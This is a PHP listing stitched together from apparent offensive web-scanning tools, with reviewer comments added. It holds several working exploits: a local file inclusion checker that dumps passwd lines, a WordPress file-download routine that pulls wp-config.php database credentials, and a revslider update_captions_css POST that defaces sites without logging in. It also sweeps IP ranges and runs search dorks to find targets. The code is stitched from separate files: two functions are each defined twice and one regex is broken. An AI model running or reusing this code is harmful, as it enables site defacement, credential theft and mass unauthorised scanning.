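/**
 * Check a fetched response body for passwd-style account lines and log the result.
 *
 * Reads $config['file'] (label of the path under test), $config['line'] (separator
 * text), $config['alvo'] (target label written to the log) and $rest['corpo']
 * (the response body). When the body contains "root" (case-insensitive), every
 * fragment starting at "root:", "sbin:", "ftp:", "nobody:" or "mail:" is printed,
 * appended to lfi.txt in the working directory, and the script ends via exit.
 * Otherwise a "NOT VULN" line is printed and the function returns.
 *
 * Review notes:
 *  - The verdict keys on the bare word "root", so any page that merely mentions it
 *    is reported as vulnerable; treat results as leads that need manual confirmation.
 *  - lfi.txt accumulates content read from the tested host; handle it as sensitive
 *    engagement evidence.
 *  - For defenders: a response body carrying passwd-format lines is the signal
 *    this check relies on, so the same signal is usable for response inspection.
 *
 * @param array $config Keys read here: 'file', 'line', 'alvo'.
 * @param array $rest   Key read here: 'corpo' (response body).
 * @return void
 */
function main($config, $rest)
{
    __plus();
    // 'H:i:s' is hour:minute:second; the previous 'h:m:s' put the month number
    // where the minutes belong, which made the log timestamps unusable.
    print "[ " . date("H:i:s") . " ] [!][EXPLOITATION THE FILE]:{$config['file']}\n";

    // Collect matches in the fixed order root, sbin, ftp, nobody, mail.
    $_final = array();
    foreach (array('root', 'sbin', 'ftp', 'nobody', 'mail') as $account) {
        preg_match_all("({$account}:.*)", $rest['corpo'], $found);
        $_final = array_merge($_final, $found[0]);
    }

    if (preg_match("#root#i", $rest['corpo'])) {
        $res = "[ " . date("H:i:s") . " ] [+][IS VULN][RESUME][VALUES]:\n";
        $res .= $config['line'] . "\n";
        foreach ($_final as $value) {
            $res .= "[ " . date("H:i:s") . " ] [VALUE]: {$value}\n";
        }
        $res .= $config['line'];
        __plus();
        file_put_contents('lfi.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: lfi.txt\n\n";
        // Terminates the whole script after the first positive result.
        exit;
    }

    print "[ " . date("H:i:s") . " ] [x][NOT VULN]\n";
}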
/**
 * Entry point of the RouterHunterBR scan loop: prints the banner and legal
 * disclaimer, then hands one IPv4 address at a time to __subProcess().
 *
 * $params['op'] selects where the addresses come from:
 *  - 0: $params['range'] holds four [start, end] pairs, one per octet. Each octet
 *       is swept in turn from start up to (not including) end while the other
 *       three octets stay at their start value.
 *  - 1: addresses come from __getIPRandom(); the loop runs from 0 through
 *       $params['limit-ip'] inclusive.
 *  - 2: addresses come from the array in $params['file'].
 *
 * Colour codes are read from $_SESSION ("c00", "c01", "c02", "c09", "c13").
 * __banner(), __plus(), __subProcess(), __getIPRandom() and not_isnull_empty()
 * are defined outside this block.
 *
 * @param array $params Keys read here: 'line', 'op', 'range', 'limit-ip', 'file'.
 * @return void
 */
function main($params)
{
    echo __banner("{$_SESSION["c13"]}{$params['line']}{$_SESSION["c00"]}", 1);
    echo "{$_SESSION["c01"]}Starting SCANNER RouterHunterBR 1.0 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c09"]}\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c00"]}\n\n";

    switch ($params['op']) {
        case 0:
            // Sweep one octet position at a time; the remaining octets are
            // re-read from the range start values on every iteration.
            for ($pos = 0; $pos < 4; $pos++) {
                for ($i = $params['range'][$pos][0]; $i < $params['range'][$pos][1]; $i++) {
                    __plus();
                    $octets = array(
                        $params['range'][0][0],
                        $params['range'][1][0],
                        $params['range'][2][0],
                        $params['range'][3][0],
                    );
                    $octets[$pos] = $i;
                    __subProcess($params, implode('.', $octets));
                    __plus();
                }
            }
            break;

        case 1:
            // A missing limit only triggers the banner call; the loop below still runs.
            if (!not_isnull_empty($params['limit-ip'])) {
                __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}");
            }
            for ($i = 0; $i <= $params['limit-ip']; $i++) {
                __subProcess($params, __getIPRandom());
                __plus();
            }
            break;

        case 2:
            // A non-array 'file' only triggers the banner call; the foreach below still runs.
            if (!is_array($params['file'])) {
                __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}");
            }
            __plus();
            foreach ($params['file'] as $value) {
                __subProcess($params, $value);
                __plus();
            }
            break;
    }
}
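/**
 * Request $url . $plugin and report whether the response looks like a disclosed
 * wp-config.php or passwd file.
 *
 * Flow, as written:
 *  1. GET the URL with response headers included in the returned body.
 *  2. If the body contains an absolute path ending in /wp-content/ wrapped in a
 *     bold tag (presumably leaked by an HTML-formatted error message), call this
 *     function again with "&file=<that path minus wp-content/>wp-config.php"
 *     appended to $plugin and return its result.
 *  3. If the body contains "DB_NAME" or "root:", extract the DB_* settings and
 *     passwd-style lines, print a coloured summary and append a colour-stripped
 *     copy to WORDPRESS_A_F_D.txt in the working directory.
 *  4. Otherwise print a "NOT VULN" line.
 *
 * Review notes:
 *  - The request carries a fixed User-Agent beginning "::INURLBR::/1.0.1", which
 *    makes this traffic easy to spot in web-server logs.
 *  - WORDPRESS_A_F_D.txt ends up holding database credentials in clear text;
 *    treat it as sensitive engagement evidence.
 *  - Step 2 has no depth limit: a server that keeps returning the path marker
 *    causes unbounded recursion.
 *  - The $status[...][0][0] reads are unguarded, so a body that matches only one
 *    of the two markers raises undefined-offset notices for the other group.
 *  - The colour sequences appear in this listing without a leading ESC byte;
 *    it may have been lost when the page was extracted. Not verifiable from here.
 *
 * @param string $url    Base URL of the site under test.
 * @param string $plugin Path and query string appended to $url.
 * @return mixed Result of the nested call in step 2; otherwise nothing is returned.
 */
function __request($url, $plugin)
{
    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();

    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
    // The overall timeout (10 s) is shorter than the connect timeout (20 s),
    // so the connect value is never the limiting one.
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
    $corpo = curl_exec($objcurl);

    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
        // Release this handle before recursing; the original returned without closing it.
        curl_close($objcurl);
        return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();

    // NOTE(review): the third pattern has an unbalanced "(" and does not compile;
    // preg_match() warns and returns false, so that alternative never matches.
    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
        // Database settings as they appear in wp-config.php define() lines.
        foreach (array('DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'DB_CHARSET') as $setting) {
            preg_match_all("({$setting}.*')", $corpo, $status[$setting]);
        }
        // Passwd-style account lines.
        $accounts = array('pwd1' => 'root', 'pwd2' => 'sbin', 'pwd3' => 'ftp', 'pwd4' => 'nobody', 'pwd5' => 'mail');
        foreach ($accounts as $slot => $account) {
            preg_match_all("({$account}:.*)", $corpo, $status[$slot]);
        }
        __plus();

        // Timestamps use 'H:i:s' (hour:minute:second); the previous 'h:m:s'
        // printed the month number in the minutes position.
        $res = "\n------------------------------------------------------------------------------------------------------------------\n[0;32m0x " . date("H:i:s") . " [INFO][VULN]:: [1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
        $res .= "[0;32m0x " . date("H:i:s") . " [INFO][VULN][DB]::[1;37m " . $status['DB_NAME'][0][0];
        $res .= "::" . $status['DB_USER'][0][0];
        $res .= "::" . $status['DB_PASSWORD'][0][0];
        $res .= "::" . $status['DB_HOST'][0][0];
        $res .= "::" . $status['DB_CHARSET'][0][0];
        $res .= preg_match("#root#i", $corpo) ? "\n[0;32m0x " . date("H:i:s") . "[INFO][VULN][FILE_PASSWORD]::[1;37m{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}[0m" : NULL;
        $res .= "\n[0;32m0x " . date("H:i:s") . " [INFO][VULN][URL]::[1;37m{$url}{$plugin}[0m";
        $res .= "\n------------------------------------------------------------------------------------------------------------------\n[0m";
        print $res;

        // Strip the colour codes before writing the plain-text log.
        $res = str_replace('[1;37m', '', str_replace('[0m', '', str_replace('[0;32m', '', $res)));
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {
        print "\n[1;31m0x " . date("H:i:s") . " [INFO][NOT VULN]::[1;37m {$url}{$plugin} \n[0m";
    }

    curl_close($objcurl);
    __plus();
}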
/**
 * Send one POST to a site's /wp-admin/admin-ajax.php using the revslider AJAX
 * action shown below, and report whether the response contains "true".
 *
 * Keys read from $__: 'target' (site base URL), 'proxy' (optional proxy, null to
 * skip), 'deface' (content sent in the "data" field) and 'line' (separator text).
 * On a "true" response the get_captions_css URL is printed and appended to
 * revslider.txt; otherwise a "nothing changed" line is printed.
 *
 * Review notes:
 *  - Log signature of this request: POST to /wp-admin/admin-ajax.php with
 *    action=revslider_ajax_action and client_action=update_captions_css, sent
 *    here without any credentials.
 *  - Certificate and host-name verification are both switched off, so the
 *    response is trusted from whoever answers, including an intercepting proxy.
 *  - Cookies are read from and written to cookie.log in the working directory.
 *  - eregi() was removed in PHP 7.0; this block only runs on PHP 5.x.
 *
 * @param array $__ Keys read here: 'target', 'proxy', 'deface', 'line'.
 * @return void
 */
function __request($__)
{
    $endpoint = "{$__['target']}/wp-admin/admin-ajax.php";
    $handle = curl_init();

    curl_setopt($handle, CURLOPT_URL, $endpoint);
    if (!is_null($__['proxy'])) {
        curl_setopt($handle, CURLOPT_PROXY, $__['proxy']);
    }
    curl_setopt($handle, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($handle, CURLOPT_POST, 1);
    curl_setopt($handle, CURLOPT_POSTFIELDS, array(
        "action" => "revslider_ajax_action",
        "client_action" => "update_captions_css",
        "data" => $__['deface'],
    ));
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 1);
    // TLS peer and host checks are disabled for this request.
    curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($handle, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($handle, CURLOPT_COOKIEJAR, 'cookie.log');

    // The return value of __plus() is appended to the response body, as in the original.
    $result = curl_exec($handle) . __plus();

    if (eregi('true', $result)) {
        $modifiedUrl = "{$endpoint}?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$modifiedUrl}\n{$__['line']}\n";
        __plus();
        file_put_contents("revslider.txt", "{$modifiedUrl}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }

    curl_close($handle);
    unset($handle);
}
/**
 * Build the list of search queries ("dorks") and run each one through the
 * search engines, then hand the collected URLs to __process().
 *
 * Query sources, merged, de-duplicated and stripped of empty entries:
 *  - $dork itself, split on the literal marker "[DORK]" when present;
 *  - the file named in $_SESSION['config']['dork-file'], when set
 *    (otherwise the split $dork list is used again);
 *  - __randomDork() output when $_SESSION['config']['dork-rand'] is set.
 *
 * When $_SESSION['config']['pr'] is truthy, collected URLs are processed and
 * cleared after every query; otherwise they are processed once after the loop.
 * The function ends by calling __exitProcess().
 *
 * Review notes:
 *  - $motor and $cod are accepted but not used in this block.
 *  - array_unique() and array_filter() keep the original keys, while the loop
 *    indexes 0..count() and skips empty slots, so entries whose key is above
 *    the final count are never visited.
 *
 * @param string $dork  One query, or several joined by "[DORK]".
 * @param mixed  $motor Unused here.
 * @param mixed  $cod   Unused here.
 * @return void
 */
function __main($dork, $motor, $cod)
{
    $inline = strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork);

    $fromFile = $inline;
    if (not_isnull_empty($_SESSION['config']['dork-file'])) {
        $fromFile = __openFile($_SESSION['config']['dork-file'], 1);
    }

    $random = array();
    if (not_isnull_empty($_SESSION['config']['dork-rand'])) {
        $random = __randomDork($_SESSION['config']['dork-rand']);
    }

    $queue = array_filter(array_unique(array_merge($inline, $fromFile, $random)));

    // Optional proxy list; anything that is not an array is treated as "no proxies".
    $file_proxy = NULL;
    if (not_isnull_empty($_SESSION['config']['proxy-file'])) {
        $file_proxy = __openFile($_SESSION['config']['proxy-file'], 1);
    }
    $list_proxy = NULL;
    if (is_array($file_proxy)) {
        $list_proxy = $file_proxy;
    }

    print __bannerLogo();
    __startingBanner();

    for ($i = 0; $i <= count($queue); $i++) {
        if (empty($queue[$i])) {
            continue;
        }

        echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$queue[$i]} ]\n";

        __engines(urlencode($queue[$i]), $list_proxy) . __plus();

        // 'pr' is checked twice on purpose: once to process, once to clear.
        if ($_SESSION["config"]["pr"]) {
            __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus();
        }
        if ($_SESSION["config"]["pr"]) {
            $_SESSION["config"]["totas_urls"] = NULL;
        }
        echo "\n";
    }

    if (!$_SESSION["config"]["pr"]) {
        __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus();
    }
    __exitProcess();
}